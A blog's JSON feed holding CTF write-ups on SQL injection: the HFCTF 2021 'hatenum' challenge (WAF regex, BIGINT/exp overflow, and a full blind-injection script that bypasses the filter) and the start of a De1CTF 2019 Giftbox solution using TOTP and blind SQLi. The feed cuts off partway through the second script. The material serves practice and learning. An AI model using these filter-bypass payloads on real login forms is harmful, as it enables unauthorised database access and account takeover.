{
    "version": "https://jsonfeed.org/version/1",
    "title": "Hexo • All posts by \"sql注入\" tag",
    "description": "",
    "home_page_url": "http://odiws.github.io",
    "items": [
        {
            "id": "http://odiws.github.io/2025/02/23/HFCTF-2021-Final-hatenum/",
            "url": "http://odiws.github.io/2025/02/23/HFCTF-2021-Final-hatenum/",
            "title": "[HFCTF_2021_Final]hatenum",
            "date_published": "2025-02-23T12:24:52.000Z",
            "content_html": "<h2 id=\"hfctf_2021_finalhatenum\"><a class=\"markdownIt-Anchor\" href=\"#hfctf_2021_finalhatenum\">#</a> [HFCTF_2021_Final]hatenum</h2>\n<figure class=\"highlight php\"><figcaption data-lang=\"PHP\"></figcaption><table><tr><td data-num=\"1\"></td><td><pre><span class=\"token keyword\">function</span> <span class=\"token function-definition function\">sql_waf</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$str</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">&#123;</span></pre></td></tr><tr><td data-num=\"2\"></td><td><pre>    <span class=\"token keyword\">if</span><span class=\"token punctuation\">(</span><span class=\"token function\">preg_match</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'/union|select|or|and|\\'|\"|sleep|benchmark|regexp|repeat|get_lock|count|=|>|&lt;| |\\*|,|;|\\r|\\n|\\t|substr|right|left|mid/i'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$str</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">&#123;</span></pre></td></tr><tr><td data-num=\"3\"></td><td><pre>        <span class=\"token keyword\">die</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'Hack detected'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></pre></td></tr><tr><td data-num=\"4\"></td><td><pre>    <span class=\"token punctuation\">&#125;</span></pre></td></tr><tr><td data-num=\"5\"></td><td><pre><span class=\"token punctuation\">&#125;</span></pre></td></tr><tr><td data-num=\"6\"></td><td><pre> </pre></td></tr><tr><td data-num=\"7\"></td><td><pre><span class=\"token keyword\">function</span> <span class=\"token function-definition function\">num_waf</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$str</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">&#123;</span></pre></td></tr><tr><td data-num=\"8\"></td><td><pre>    <span class=\"token keyword\">if</span><span class=\"token punctuation\">(</span><span class=\"token function\">preg_match</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'/\\d&#123;9&#125;|0x[0-9a-f]&#123;9&#125;/i'</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$str</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">&#123;</span></pre></td></tr><tr><td data-num=\"9\"></td><td><pre>        <span class=\"token keyword\">die</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'Huge num detected'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></pre></td></tr><tr><td data-num=\"10\"></td><td><pre>    <span class=\"token punctuation\">&#125;</span></pre></td></tr><tr><td data-num=\"11\"></td><td><pre><span class=\"token punctuation\">&#125;</span></pre></td></tr></table></figure><p>过滤了这么多东西，竟然还是 SQL 注入还是不太能理解的</p>\n<p><span class=\"exturl\" data-url=\"aHR0cHM6Ly90dHRhbmcuY29tL2FyY2hpdmUvMTI3MS8=\">https://tttang.com/archive/1271/</span> 基于 BIGINT 溢出错误的 SQL 注入</p>\n<p>MySQL 的整数处理顺序：</p>\n<p><img data-src=\"https://zty--666.oss-cn-shanghai.aliyuncs.com/202502232028243.png\" alt=\"image-20250223202844911\"></p>\n<p>只有 5.5.5 及其以上版本的 MySQL 才会产生溢出错误消息，之下的版本对于整数溢出不会发送任何消息。</p>\n<p>数据类型 BIGINT 的长度为 8 字节，也就是说，长度为 64 比特。这种数据类型最大的有符号值，用二进制、十六进制和十进制的表示形式分别为 “0b0111111111111111111111111111111111111111111111111111111111111111”、“0x7fffffffffffffff” 和 “9223372036854775807”。 当对这个值进行某些数值运算的时候，比如加法运算，就会引起 “BIGINT value is out of range” 错误。</p>\n<pre><code>mysql&gt; select 9223372036854775807+1;\nERROR 1690 (22003): BIGINT value is out of range in '(9223372036854775807 + 1)'\n</code></pre>\n<p>为了避免出现上面这样的错误，我们只需将其转换为无符号整数即可。</p>\n<p>对于无符号整数来说，BIGINT 可以存放的最大值用二进制、十六进制和十进制表示的话，分别为 “ <code>0b1111111111111111111111111111111111111111111111111111111111111111</code> ”、“ <code>0xFFFFFFFFFFFFFFFF</code> ” 和 “ <code>18446744073709551615</code> ”。</p>\n<p>同样的，如果对这个值进行数值表达式运算，如加法或减法运算，同样也会导致 “BIGINT value is out of range” 错误。</p>\n<pre><code># In decimal\nmysql&gt; select 18446744073709551615+1;\nERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(18446744073709551615 + 1)'\n\n# In binary\nmysql&gt; select cast(b'1111111111111111111111111111111111111111111111111111111111111111' as unsigned)+1;\nERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(cast(0xffffffffffffffff as unsigned) + 1)'\n\n# In hex\nmysql&gt; select cast(x'FFFFFFFFFFFFFFFF' as unsigned)+1;\nERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(cast(0xffffffffffffffff as unsigned) + 1)'\n</code></pre>\n<p>如果我们对数值 0 逐位取反，结果会怎么样呢？ 当然是得到一个无符号的最大 BIGINT 值，这一点是显而易见的。</p>\n<pre><code>mysql&gt; select ~0;\n+----------------------+\n| ~0 |\n+----------------------+\n| 18446744073709551615 |\n+----------------------+\n1 row in set (0.00 sec)\n</code></pre>\n<p>所以，如果我们对～0 进行加减运算的话，也会导致 BIGINT 溢出错误。</p>\n<pre><code>mysql&gt; select 1-~0;\nERROR 1690 (22003): BIGINT value is out of range in '(1 - ~(0))'\nmysql&gt; select 1+~0;\nERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(1 + ~(0))'\n</code></pre>\n<p>参考大佬的脚本：</p>\n<figure class=\"highlight python\"><figcaption data-lang=\"python\"></figcaption><table><tr><td data-num=\"1\"></td><td><pre><span class=\"token keyword\">import</span> requests <span class=\"token keyword\">as</span> r</pre></td></tr><tr><td data-num=\"2\"></td><td><pre><span class=\"token keyword\">import</span> string</pre></td></tr><tr><td data-num=\"3\"></td><td><pre> </pre></td></tr><tr><td data-num=\"4\"></td><td><pre>url <span class=\"token operator\">=</span> <span class=\"token string\">\"http://d8e4fa3b-e3f4-4479-9724-2fead42e5a70.node4.buuoj.cn:81/\"</span></pre></td></tr><tr><td data-num=\"5\"></td><td><pre>pt <span class=\"token operator\">=</span> string<span class=\"token punctuation\">.</span>ascii_letters<span class=\"token operator\">+</span>string<span class=\"token punctuation\">.</span>digits<span class=\"token operator\">+</span><span class=\"token string\">\"$\"</span></pre></td></tr><tr><td data-num=\"6\"></td><td><pre> </pre></td></tr><tr><td data-num=\"7\"></td><td><pre><span class=\"token comment\">#/union|select|or|and|\\'|\"|sleep|benchmark|regexp|repeat|get_lock|count|=|>|&lt;| |\\*|,|;|\\r|\\n|\\t|substr|right|left|mid/i</span></pre></td></tr><tr><td data-num=\"8\"></td><td><pre><span class=\"token comment\">#select * from users where username='$username' and password='$password'</span></pre></td></tr><tr><td data-num=\"9\"></td><td><pre> </pre></td></tr><tr><td data-num=\"10\"></td><td><pre><span class=\"token keyword\">def</span> <span class=\"token function\">str2hex</span><span class=\"token punctuation\">(</span>raw<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"11\"></td><td><pre>    ret <span class=\"token operator\">=</span> <span class=\"token string\">'0x'</span></pre></td></tr><tr><td data-num=\"12\"></td><td><pre>    <span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> raw<span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"13\"></td><td><pre>        ret <span class=\"token operator\">+=</span> <span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">ord</span><span class=\"token punctuation\">(</span>i<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">2</span><span class=\"token punctuation\">:</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span>rjust<span class=\"token punctuation\">(</span><span class=\"token number\">2</span><span class=\"token punctuation\">,</span><span class=\"token string\">'0'</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"14\"></td><td><pre>    <span class=\"token keyword\">return</span> ret</pre></td></tr><tr><td data-num=\"15\"></td><td><pre> </pre></td></tr><tr><td data-num=\"16\"></td><td><pre>ans <span class=\"token operator\">=</span> <span class=\"token string\">\"\"</span></pre></td></tr><tr><td data-num=\"17\"></td><td><pre>tmp <span class=\"token operator\">=</span> <span class=\"token string\">\"^\"</span></pre></td></tr><tr><td data-num=\"18\"></td><td><pre> </pre></td></tr><tr><td data-num=\"19\"></td><td><pre><span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">24</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"20\"></td><td><pre>    <span class=\"token keyword\">for</span> ch <span class=\"token keyword\">in</span> pt<span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"21\"></td><td><pre>        <span class=\"token comment\">#payload = f\"||1 &amp;&amp; username rlike 0x61646d &amp;&amp; exp(710-(23-length(code)))#\".replace(' ',chr(0x0c))</span></pre></td></tr><tr><td data-num=\"22\"></td><td><pre> </pre></td></tr><tr><td data-num=\"23\"></td><td><pre>        payload <span class=\"token operator\">=</span> <span class=\"token string-interpolation\"><span class=\"token string\">f\"||1 &amp;&amp; username rlike 0x61646d &amp;&amp; exp(710-(code rlike binary </span><span class=\"token interpolation\"><span class=\"token punctuation\">&#123;</span>str2hex<span class=\"token punctuation\">(</span>tmp<span class=\"token operator\">+</span>ch<span class=\"token punctuation\">)</span><span class=\"token punctuation\">&#125;</span></span><span class=\"token string\">))#\"</span></span></pre></td></tr><tr><td data-num=\"24\"></td><td><pre>        <span class=\"token comment\">#print(payload)</span></pre></td></tr><tr><td data-num=\"25\"></td><td><pre> </pre></td></tr><tr><td data-num=\"26\"></td><td><pre>        payload <span class=\"token operator\">=</span> payload<span class=\"token punctuation\">.</span>replace<span class=\"token punctuation\">(</span><span class=\"token string\">' '</span><span class=\"token punctuation\">,</span><span class=\"token builtin\">chr</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x0c</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"27\"></td><td><pre> </pre></td></tr><tr><td data-num=\"28\"></td><td><pre>        data <span class=\"token operator\">=</span> <span class=\"token punctuation\">&#123;</span></pre></td></tr><tr><td data-num=\"29\"></td><td><pre>            <span class=\"token string\">\"username\"</span><span class=\"token punctuation\">:</span><span class=\"token string\">\"eki\\\\\"</span><span class=\"token punctuation\">,</span></pre></td></tr><tr><td data-num=\"30\"></td><td><pre>            <span class=\"token string\">\"password\"</span><span class=\"token punctuation\">:</span>payload<span class=\"token punctuation\">,</span></pre></td></tr><tr><td data-num=\"31\"></td><td><pre>            <span class=\"token string\">\"code\"</span><span class=\"token punctuation\">:</span><span class=\"token string\">\"1\"</span></pre></td></tr><tr><td data-num=\"32\"></td><td><pre>        <span class=\"token punctuation\">&#125;</span></pre></td></tr><tr><td data-num=\"33\"></td><td><pre> </pre></td></tr><tr><td data-num=\"34\"></td><td><pre>        req <span class=\"token operator\">=</span> r<span class=\"token punctuation\">.</span>post<span class=\"token punctuation\">(</span>url<span class=\"token operator\">+</span><span class=\"token string\">\"/login.php\"</span><span class=\"token punctuation\">,</span>data<span class=\"token operator\">=</span>data<span class=\"token punctuation\">,</span>allow_redirects<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"35\"></td><td><pre> </pre></td></tr><tr><td data-num=\"36\"></td><td><pre>        <span class=\"token keyword\">if</span> <span class=\"token string\">'fail'</span> <span class=\"token keyword\">in</span> req<span class=\"token punctuation\">.</span>text<span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"37\"></td><td><pre>            ans <span class=\"token operator\">+=</span> ch</pre></td></tr><tr><td data-num=\"38\"></td><td><pre>            <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>tmp<span class=\"token operator\">+</span>ch<span class=\"token punctuation\">,</span>ans<span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"39\"></td><td><pre>            <span class=\"token keyword\">if</span> <span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>tmp<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">3</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"40\"></td><td><pre>                tmp <span class=\"token operator\">=</span> tmp<span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">:</span><span class=\"token punctuation\">]</span><span class=\"token operator\">+</span>ch</pre></td></tr><tr><td data-num=\"41\"></td><td><pre>            <span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"42\"></td><td><pre>                tmp <span class=\"token operator\">+=</span> ch</pre></td></tr><tr><td data-num=\"43\"></td><td><pre> </pre></td></tr><tr><td data-num=\"44\"></td><td><pre>            <span class=\"token keyword\">break</span></pre></td></tr><tr><td data-num=\"45\"></td><td><pre> </pre></td></tr><tr><td data-num=\"46\"></td><td><pre><span class=\"token triple-quoted-string string\">'''</pre></td></tr><tr><td data-num=\"47\"></td><td><pre>^e e</pre></td></tr><tr><td data-num=\"48\"></td><td><pre>^er er</pre></td></tr><tr><td data-num=\"49\"></td><td><pre>^erg erg</pre></td></tr><tr><td data-num=\"50\"></td><td><pre>ergh ergh</pre></td></tr><tr><td data-num=\"51\"></td><td><pre>rghr erghr</pre></td></tr><tr><td data-num=\"52\"></td><td><pre>ghru erghru</pre></td></tr><tr><td data-num=\"53\"></td><td><pre>hrui erghrui</pre></td></tr><tr><td data-num=\"54\"></td><td><pre>ruig erghruig</pre></td></tr><tr><td data-num=\"55\"></td><td><pre>uigh erghruigh</pre></td></tr><tr><td data-num=\"56\"></td><td><pre>igh2 erghruigh2</pre></td></tr><tr><td data-num=\"57\"></td><td><pre>gh2u erghruigh2u</pre></td></tr><tr><td data-num=\"58\"></td><td><pre>h2uy erghruigh2uy</pre></td></tr><tr><td data-num=\"59\"></td><td><pre>2uyg erghruigh2uyg</pre></td></tr><tr><td data-num=\"60\"></td><td><pre>uygh erghruigh2uygh</pre></td></tr><tr><td data-num=\"61\"></td><td><pre>ygh2 erghruigh2uygh2</pre></td></tr><tr><td data-num=\"62\"></td><td><pre>gh2u erghruigh2uygh2u</pre></td></tr><tr><td data-num=\"63\"></td><td><pre>h2uy erghruigh2uygh2uy</pre></td></tr><tr><td data-num=\"64\"></td><td><pre>2uyg erghruigh2uygh2uyg</pre></td></tr><tr><td data-num=\"65\"></td><td><pre>uygh erghruigh2uygh2uygh</pre></td></tr><tr><td data-num=\"66\"></td><td><pre>'''</span></pre></td></tr><tr><td data-num=\"67\"></td><td><pre> </pre></td></tr><tr><td data-num=\"68\"></td><td><pre>rev_ans <span class=\"token operator\">=</span> <span class=\"token string\">\"\"</span></pre></td></tr><tr><td data-num=\"69\"></td><td><pre>tmp <span class=\"token operator\">=</span> <span class=\"token string\">\"$\"</span></pre></td></tr><tr><td data-num=\"70\"></td><td><pre> </pre></td></tr><tr><td data-num=\"71\"></td><td><pre><span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">24</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"72\"></td><td><pre>    <span class=\"token keyword\">for</span> ch <span class=\"token keyword\">in</span> pt<span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"73\"></td><td><pre>        <span class=\"token comment\">#payload = f\"||1 &amp;&amp; username rlike 0x61646d &amp;&amp; exp(710-(23-length(code)))#\".replace(' ',chr(0x0c))</span></pre></td></tr><tr><td data-num=\"74\"></td><td><pre> </pre></td></tr><tr><td data-num=\"75\"></td><td><pre>        payload <span class=\"token operator\">=</span> <span class=\"token string-interpolation\"><span class=\"token string\">f\"||1 &amp;&amp; username rlike 0x61646d &amp;&amp; exp(710-(code rlike binary </span><span class=\"token interpolation\"><span class=\"token punctuation\">&#123;</span>str2hex<span class=\"token punctuation\">(</span>ch<span class=\"token operator\">+</span>tmp<span class=\"token punctuation\">)</span><span class=\"token punctuation\">&#125;</span></span><span class=\"token string\">))#\"</span></span></pre></td></tr><tr><td data-num=\"76\"></td><td><pre>        <span class=\"token comment\">#print(payload)</span></pre></td></tr><tr><td data-num=\"77\"></td><td><pre> </pre></td></tr><tr><td data-num=\"78\"></td><td><pre>        payload <span class=\"token operator\">=</span> payload<span class=\"token punctuation\">.</span>replace<span class=\"token punctuation\">(</span><span class=\"token string\">' '</span><span class=\"token punctuation\">,</span><span class=\"token builtin\">chr</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x0c</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"79\"></td><td><pre> </pre></td></tr><tr><td data-num=\"80\"></td><td><pre>        data <span class=\"token operator\">=</span> <span class=\"token punctuation\">&#123;</span></pre></td></tr><tr><td data-num=\"81\"></td><td><pre>            <span class=\"token string\">\"username\"</span><span class=\"token punctuation\">:</span><span class=\"token string\">\"eki\\\\\"</span><span class=\"token punctuation\">,</span></pre></td></tr><tr><td data-num=\"82\"></td><td><pre>            <span class=\"token string\">\"password\"</span><span class=\"token punctuation\">:</span>payload<span class=\"token punctuation\">,</span></pre></td></tr><tr><td data-num=\"83\"></td><td><pre>            <span class=\"token string\">\"code\"</span><span class=\"token punctuation\">:</span><span class=\"token string\">\"1\"</span></pre></td></tr><tr><td data-num=\"84\"></td><td><pre>        <span class=\"token punctuation\">&#125;</span></pre></td></tr><tr><td data-num=\"85\"></td><td><pre> </pre></td></tr><tr><td data-num=\"86\"></td><td><pre>        req <span class=\"token operator\">=</span> r<span class=\"token punctuation\">.</span>post<span class=\"token punctuation\">(</span>url<span class=\"token operator\">+</span><span class=\"token string\">\"/login.php\"</span><span class=\"token punctuation\">,</span>data<span class=\"token operator\">=</span>data<span class=\"token punctuation\">,</span>allow_redirects<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"87\"></td><td><pre> </pre></td></tr><tr><td data-num=\"88\"></td><td><pre>        <span class=\"token keyword\">if</span> <span class=\"token string\">'fail'</span> <span class=\"token keyword\">in</span> req<span class=\"token punctuation\">.</span>text<span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"89\"></td><td><pre>            rev_ans <span class=\"token operator\">=</span> ch<span class=\"token operator\">+</span>rev_ans</pre></td></tr><tr><td data-num=\"90\"></td><td><pre>            <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>ch<span class=\"token operator\">+</span>tmp<span class=\"token punctuation\">,</span>rev_ans<span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"91\"></td><td><pre>            <span class=\"token keyword\">if</span> <span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>tmp<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">3</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"92\"></td><td><pre>                tmp <span class=\"token operator\">=</span> ch<span class=\"token operator\">+</span>tmp<span class=\"token punctuation\">[</span><span class=\"token punctuation\">:</span><span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span></pre></td></tr><tr><td data-num=\"93\"></td><td><pre>            <span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"94\"></td><td><pre>                tmp <span class=\"token operator\">=</span> ch<span class=\"token operator\">+</span>tmp</pre></td></tr><tr><td data-num=\"95\"></td><td><pre> </pre></td></tr><tr><td data-num=\"96\"></td><td><pre>            <span class=\"token keyword\">break</span></pre></td></tr><tr><td data-num=\"97\"></td><td><pre> </pre></td></tr><tr><td data-num=\"98\"></td><td><pre><span class=\"token triple-quoted-string string\">'''</pre></td></tr><tr><td data-num=\"99\"></td><td><pre>g$ g</pre></td></tr><tr><td data-num=\"100\"></td><td><pre>ig$ ig</pre></td></tr><tr><td data-num=\"101\"></td><td><pre>2ig$ 2ig</pre></td></tr><tr><td data-num=\"102\"></td><td><pre>32ig 32ig</pre></td></tr><tr><td data-num=\"103\"></td><td><pre>u32i u32ig</pre></td></tr><tr><td data-num=\"104\"></td><td><pre>iu32 iu32ig</pre></td></tr><tr><td data-num=\"105\"></td><td><pre>uiu3 uiu32ig</pre></td></tr><tr><td data-num=\"106\"></td><td><pre>3uiu 3uiu32ig</pre></td></tr><tr><td data-num=\"107\"></td><td><pre>23ui 23uiu32ig</pre></td></tr><tr><td data-num=\"108\"></td><td><pre>h23u h23uiu32ig</pre></td></tr><tr><td data-num=\"109\"></td><td><pre>gh23 gh23uiu32ig</pre></td></tr><tr><td data-num=\"110\"></td><td><pre>igh2 igh23uiu32ig</pre></td></tr><tr><td data-num=\"111\"></td><td><pre>uigh uigh23uiu32ig</pre></td></tr><tr><td data-num=\"112\"></td><td><pre>ruig ruigh23uiu32ig</pre></td></tr><tr><td data-num=\"113\"></td><td><pre>hrui hruigh23uiu32ig</pre></td></tr><tr><td data-num=\"114\"></td><td><pre>ghru ghruigh23uiu32ig</pre></td></tr><tr><td data-num=\"115\"></td><td><pre>rghr rghruigh23uiu32ig</pre></td></tr><tr><td data-num=\"116\"></td><td><pre>ergh erghruigh23uiu32ig</pre></td></tr><tr><td data-num=\"117\"></td><td><pre>'''</span></pre></td></tr><tr><td data-num=\"118\"></td><td><pre> </pre></td></tr><tr><td data-num=\"119\"></td><td><pre>data <span class=\"token operator\">=</span> <span class=\"token punctuation\">&#123;</span></pre></td></tr><tr><td data-num=\"120\"></td><td><pre>    <span class=\"token string\">\"username\"</span><span class=\"token punctuation\">:</span><span class=\"token string\">\"admin\\\\\"</span><span class=\"token punctuation\">,</span></pre></td></tr><tr><td data-num=\"121\"></td><td><pre>    <span class=\"token string\">\"password\"</span><span class=\"token punctuation\">:</span><span class=\"token string\">\"||1#\"</span><span class=\"token punctuation\">,</span></pre></td></tr><tr><td data-num=\"122\"></td><td><pre>    <span class=\"token string\">\"code\"</span><span class=\"token punctuation\">:</span><span class=\"token string\">\"erghruigh2uygh23uiu32ig\"</span></pre></td></tr><tr><td data-num=\"123\"></td><td><pre><span class=\"token punctuation\">&#125;</span></pre></td></tr><tr><td data-num=\"124\"></td><td><pre> </pre></td></tr><tr><td data-num=\"125\"></td><td><pre>req <span class=\"token operator\">=</span> r<span class=\"token punctuation\">.</span>post<span class=\"token punctuation\">(</span>url<span class=\"token operator\">+</span><span class=\"token string\">\"/login.php\"</span><span class=\"token punctuation\">,</span>data<span class=\"token operator\">=</span>data<span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"126\"></td><td><pre> </pre></td></tr><tr><td data-num=\"127\"></td><td><pre><span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>req<span class=\"token punctuation\">.</span>text<span class=\"token punctuation\">)</span></pre></td></tr></table></figure><p>payload 分析：</p>\n<pre><code>||1 &amp;&amp; username rlike 0x61646d &amp;&amp; exp(710-(23-length(code)))#\n\n</code></pre>\n<p>这玩意就是 rlike 跟 regexp 类似，exp (710) 会溢出，而 exp（709）不会溢出</p>\n<p>进行局部匹配，在从头到尾爆破的时候，由于 <code>gh2</code>  重复了两次，所以就会匹配到 <code>u</code> ，然后就一直重复。<br>\n这时就需要倒序也来一波爆破，才能爆破出正确结果。</p>\n<p><img data-src=\"https://zty--666.oss-cn-shanghai.aliyuncs.com/202502232035339.png\" alt=\"image-20250223203544064\"></p>\n<p>参考链接：<span class=\"exturl\" data-url=\"aHR0cHM6Ly90dHRhbmcuY29tL2FyY2hpdmUvMTI3MS8=\">https://tttang.com/archive/1271/</span></p>\n<p><span class=\"exturl\" data-url=\"aHR0cDovLzQ3Ljk2LjE3My4xMTYvMjAyMS8wOS8yNC9oZmN0Zi0yMDIxLWZpbmFsaGF0ZW51bS8=\">http://47.96.173.116/2021/09/24/hfctf-2021-finalhatenum/</span></p>\n",
            "tags": [
                "buuctf",
                "sql注入",
                "未理解"
            ]
        },
        {
            "id": "http://odiws.github.io/2024/12/10/De1CTF-2019-Giftbox/",
            "url": "http://odiws.github.io/2024/12/10/De1CTF-2019-Giftbox/",
            "title": "[De1CTF_2019]Giftbox",
            "date_published": "2024-12-10T07:25:23.000Z",
            "content_html": "<h2 id=\"de1ctf-2019giftbox\"><a class=\"markdownIt-Anchor\" href=\"#de1ctf-2019giftbox\">#</a> [De1CTF 2019]Giftbox</h2>\n<p>main.js 里给了 TOTP 的参数</p>\n<h4 id=\"totp\"><a class=\"markdownIt-Anchor\" href=\"#totp\">#</a> TOTP</h4>\n<p><img data-src=\"C:%5CUsers%5C86182%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20241210161534216.png\" alt=\"image-20241210161534216\"></p>\n<blockquote>\n<p>TOTP 算法 (Time-based One-time Password algorithm) 是一种从共享密钥和当前时间计算一次性密码的算法。它已被采纳为 Internet 工程任务组标准 RFC 6238，是 Initiative for Open Authentication (OATH) 的基石，并被用于许多双因素身份验证系统。<br>\nTOTP 是基于散列的消息认证码（HMAC）的示例。它使用加密哈希函数将密钥与当前时间戳组合在一起以生成一次性密码。 由于网络延迟和不同步时钟可能导致密码接收者必须尝试一系列可能的时间来进行身份验证，因此时间戳通常以 30 秒的间隔增加，从而减少了潜在的搜索空间。</p>\n</blockquote>\n<blockquote>\n<p>服务端时间与客户端时间相差大于 <code>15秒</code> ，需要先计算正确的 <code>totp</code>  才能调用 <code>shell.php</code></p>\n</blockquote>\n<p><img data-src=\"C:%5CUsers%5C86182%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20241210160929686.png\" alt=\"image-20241210160929686\"></p>\n<p>进来就是命令行的形式，可以试一下命令，看 wp 就是 help 查看可用的指令 -----</p>\n<pre><code>You can use following commands:\n\ncd\nls\ncat\nclear\nhelp\nexit\n</code></pre>\n<p>ls 一下找到一个 usage.md 文件，cat 一下：</p>\n<p><img data-src=\"C:%5CUsers%5C86182%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20241210161136725.png\" alt=\"image-20241210161136725\"></p>\n<p>获取到一些可以执行的文件，login 应该是要先登录了，源码没给账号就是 admin 了，密码的话不知道没给提示就是 SQL 注入爆密码了，SQL 盲注一下，这个里面可以 SQL 注入确实没想到</p>\n<figure class=\"highlight python\"><figcaption data-lang=\"python\"></figcaption><table><tr><td data-num=\"1\"></td><td><pre><span class=\"token punctuation\">[</span>De1CTF <span class=\"token number\">2019</span><span class=\"token punctuation\">]</span>Giftbox</pre></td></tr><tr><td data-num=\"2\"></td><td><pre></pre></td></tr><tr><td data-num=\"3\"></td><td><pre><span class=\"token keyword\">import</span> requests</pre></td></tr><tr><td data-num=\"4\"></td><td><pre><span class=\"token keyword\">import</span> pyotp</pre></td></tr><tr><td data-num=\"5\"></td><td><pre><span class=\"token keyword\">from</span> time <span class=\"token keyword\">import</span> sleep</pre></td></tr><tr><td data-num=\"6\"></td><td><pre><span class=\"token keyword\">import</span> re</pre></td></tr><tr><td data-num=\"7\"></td><td><pre></pre></td></tr><tr><td data-num=\"8\"></td><td><pre>url <span class=\"token operator\">=</span> <span class=\"token string\">\"http://eec68b2e-7abc-4aae-ba15-43e2f4bc23ce.node5.buuoj.cn:81//shell.php\"</span></pre></td></tr><tr><td data-num=\"9\"></td><td><pre>totp <span class=\"token operator\">=</span> pyotp<span class=\"token punctuation\">.</span>TOTP<span class=\"token punctuation\">(</span><span class=\"token string\">'GAXG24JTMZXGKZBU'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">8</span><span class=\"token punctuation\">,</span> interval<span class=\"token operator\">=</span><span class=\"token number\">5</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"10\"></td><td><pre>name <span class=\"token operator\">=</span> <span class=\"token string\">\"\"</span></pre></td></tr><tr><td data-num=\"11\"></td><td><pre>i <span class=\"token operator\">=</span> <span class=\"token number\">0</span></pre></td></tr><tr><td data-num=\"12\"></td><td><pre><span class=\"token keyword\">while</span> <span class=\"token boolean\">True</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"13\"></td><td><pre>    sleep<span class=\"token punctuation\">(</span><span class=\"token number\">0.5</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"14\"></td><td><pre>    head <span class=\"token operator\">=</span> <span class=\"token number\">32</span></pre></td></tr><tr><td data-num=\"15\"></td><td><pre>    tail <span class=\"token operator\">=</span> <span class=\"token number\">127</span></pre></td></tr><tr><td data-num=\"16\"></td><td><pre>    i <span class=\"token operator\">+=</span> <span class=\"token number\">1</span></pre></td></tr><tr><td data-num=\"17\"></td><td><pre>    <span class=\"token keyword\">while</span> <span class=\"token punctuation\">(</span>head <span class=\"token operator\">&lt;</span> tail<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"18\"></td><td><pre>        mid <span class=\"token operator\">=</span> head <span class=\"token operator\">+</span> tail <span class=\"token operator\">>></span> <span class=\"token number\">1</span></pre></td></tr><tr><td 